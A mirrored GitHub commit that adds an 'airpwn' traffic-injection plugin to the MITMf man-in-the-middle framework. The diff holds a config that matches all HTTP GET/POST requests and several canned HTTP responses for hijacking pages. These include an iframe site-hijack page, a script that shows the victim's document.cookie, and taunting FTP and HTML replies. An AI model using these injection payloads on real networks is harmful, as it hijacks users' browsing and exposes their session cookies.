mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-21 05:53:30 -07:00
added airpwn plugin
This commit is contained in:
parent
8dde6f8c60
commit
8ff9c246db
12 changed files with 162 additions and 1 deletions
9
config_files/airpwn.cfg
Normal file
9
config_files/airpwn.cfg
Normal file
|
@ -0,0 +1,9 @@
|
|||
#Example config for the AirPwn plugin
|
||||
|
||||
[site_hijack]
|
||||
match = ^(GET|POST).*
|
||||
response = ./config_files/airpwn_templates/site_hijack
|
||||
|
||||
#[puppy_jpg]
|
||||
#match = ^GET [^ ]+\.(?i:jpg|jpeg|gif|png)
|
||||
#response = ./config_files/airpwn_templates/puppy_jpg
|
3
config_files/airpwn_templates/README
Normal file
3
config_files/airpwn_templates/README
Normal file
|
@ -0,0 +1,3 @@
|
|||
Sample content used by the configurations in the conf/ directory. See
|
||||
the README there for more information.
|
||||
|
10
config_files/airpwn_templates/airpwn_cssbg
Normal file
10
config_files/airpwn_templates/airpwn_cssbg
Normal file
|
@ -0,0 +1,10 @@
|
|||
HTTP/1.1 200 OK
|
||||
Content-type: text/css
|
||||
Content-length: 103
|
||||
|
||||
body {
|
||||
background-color: red;
|
||||
background-image: url(/airpwnbg.jpg);
|
||||
background-repeat: repeat;
|
||||
}
|
||||
|
BIN
config_files/airpwn_templates/airpwned_png
Normal file
BIN
config_files/airpwn_templates/airpwned_png
Normal file
Binary file not shown.
2
config_files/airpwn_templates/ftp_resp
Normal file
2
config_files/airpwn_templates/ftp_resp
Normal file
|
@ -0,0 +1,2 @@
|
|||
331 FTP IS FUN!!!! ENJOY YOUR DATA!!!
|
||||
|
11
config_files/airpwn_templates/greet_html
Normal file
11
config_files/airpwn_templates/greet_html
Normal file
|
@ -0,0 +1,11 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
<html><head><title>HELLO DEFCON!</title>
|
||||
</head><body>
|
||||
<blink><font size=+5 color=red>
|
||||
Hello Defcon! Your wireless network is delicious!
|
||||
</font>
|
||||
</blink>
|
||||
<p>
|
13
config_files/airpwn_templates/js_html
Normal file
13
config_files/airpwn_templates/js_html
Normal file
|
@ -0,0 +1,13 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
<html><head><title>pwned</title>
|
||||
</head><body onLoad="
|
||||
alert('hi');
|
||||
alert('you');
|
||||
alert('are');
|
||||
alert('so');
|
||||
alert('owned');
|
||||
alert('cookie: ' + document.cookie);">
|
||||
|
BIN
config_files/airpwn_templates/puppy_jpg
Normal file
BIN
config_files/airpwn_templates/puppy_jpg
Normal file
Binary file not shown.
15
config_files/airpwn_templates/site_hijack
Normal file
15
config_files/airpwn_templates/site_hijack
Normal file
|
@ -0,0 +1,15 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
Content-Length: 250
|
||||
|
||||
<html>
|
||||
<head><title>hugs</title></head>
|
||||
<body>
|
||||
<iframe frameborder=0 border=0 src="http://google.com" width="100%"
|
||||
height="100%">hugs</iframe>
|
||||
<div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
|
||||
BYE BYE!
|
||||
|
||||
|
||||
<!--
|
Loading…
Add table
Add a link
Reference in a new issue